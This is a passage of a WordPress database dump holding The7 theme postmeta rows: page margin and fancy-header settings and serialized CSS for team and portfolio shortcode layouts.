(8895,2586,'_dt_header_disabled_transparent_bg_opacity','50'),
(8896,2586,'_dt_page_overrides_top_margin',''),
(8897,2586,'_dt_page_overrides_right_margin',''),
(8898,2586,'_dt_page_overrides_bottom_margin',''),
(8899,2586,'_dt_page_overrides_left_margin',''),
(8900,2586,'_dt_mobile_page_padding_top',''),
(8901,2586,'_dt_mobile_page_padding_right',''),
(8902,2586,'_dt_mobile_page_padding_bottom',''),
(8903,2586,'_dt_mobile_page_padding_left',''),
(8904,2586,'_dt_fancy_header_layout_heading',''),
(8905,2586,'_dt_fancy_header_title_aligment','center'),
(8906,2586,'_dt_fancy_header_height','300'),
(8907,2586,'_dt_fancy_header_padding-top','0px'),
(8908,2586,'_dt_fancy_header_padding-bottom','0px'),
(8909,2586,'_dt_fancy_header_breadcrumbs_heading',''),
(8910,2586,'_dt_fancy_header_breadcrumbs','disabled'),
(8911,2586,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8912,2586,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8913,2586,'_dt_fancy_header_title_heading',''),
(8914,2586,'_dt_fancy_header_title_mode','custom'),
(8915,2586,'_dt_fancy_header_title',''),
(8916,2586,'_dt_fancy_header_title_font_size','30'),
(8917,2586,'_dt_fancy_header_title_line_height','36'),
(8918,2586,'_dt_fancy_header_text_transform','none'),
(8919,2586,'_dt_fancy_header_title_color_mode','color'),
(8920,2586,'_dt_fancy_header_title_color','#000000'),
(8921,2586,'_dt_fancy_header_subtitle_heading',''),
(8922,2586,'_dt_fancy_header_subtitle',''),
(8923,2586,'_dt_fancy_header_subtitle_font_size','18'),
(8924,2586,'_dt_fancy_header_subtitle_line_height','26'),
(8925,2586,'_dt_fancy_header_subtitle_text_transform','none'),
(8926,2586,'_dt_fancy_header_subtitle_color_mode','color'),
(8927,2586,'_dt_fancy_header_subtitle_color','#ffffff'),
(8928,2586,'_dt_fancy_header_bg_heading',''),
(8929,2586,'_dt_fancy_header_bg_color','#222222'),
(8930,2586,'_dt_fancy_header_bg_image_origin','featured_image'),
(8931,2586,'_dt_fancy_header_bg_image','a:0:{}'),
(8932,2586,'_dt_fancy_header_bg_repeat','no-repeat'),
(8933,2586,'_dt_fancy_header_bg_position_x','center'),
(8934,2586,'_dt_fancy_header_bg_position_y','center'),
(8935,2586,'_dt_fancy_header_bg_fullscreen','1'),
(8936,2586,'_dt_fancy_header_bg_overlay','0'),
(8937,2586,'_dt_fancy_header_overlay_color','#000'),
(8938,2586,'_dt_fancy_header_bg_overlay_opacity','50'),
(8939,2586,'_dt_fancy_header_scroll_effect','default'),
(8940,2586,'_dt_fancy_header_bg_parallax','0.5'),
(8941,2586,'_dt_fancy_header_responsiveness_heading',''),
(8942,2586,'_dt_fancy_header_responsiveness','enabled'),
(8943,2586,'_dt_fancy_header_responsiveness_switch','778px'),
(8944,2586,'_dt_fancy_header_responsive_height','70'),
(8945,2586,'_dt_fancy_header_responsive_font_size','30'),
(8946,2586,'_dt_fancy_header_responsive_title_line_height','38'),
(8947,2586,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8948,2586,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8949,2586,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8950,2586,'_dt_project_options_back_button',''),
(8951,2586,'_dt_project_options_show_link','0'),
(8952,2586,'_dt_project_options_link',''),
(8953,2586,'_dt_project_options_link_target',''),
(8954,2586,'_dt_project_options_link_name',''),
(8955,2586,'_dt_project_options_hide_thumbnail','1'),
(8956,2586,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8957,2586,'_dt_project_options_related_mode','same'),
(8958,2586,'_dt_project_options_preview','normal'),
(8959,2586,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws8.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8961,2570,'_wp_page_template','default'),
(8962,2570,'_dt_microsite_primary_menu',''),
(8963,2570,'_dt_microsite_split_left_menu',''),
(8964,2570,'_dt_microsite_split_right_menu',''),
(8965,2570,'_dt_microsite_mobile_menu',''),
(8966,2570,'the7_shortcodes_dynamic_css','a:2:{s:32:\"ba4748b1d6b32483a6b250a663be9e31\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-ba4748b1d6b32483a6b250a663be9e31.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(8967,2586,'the7_shortcodes_dynamic_css','a:4:{s:32:\"f0fd50633414fc9ff63496fffff76a59\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59  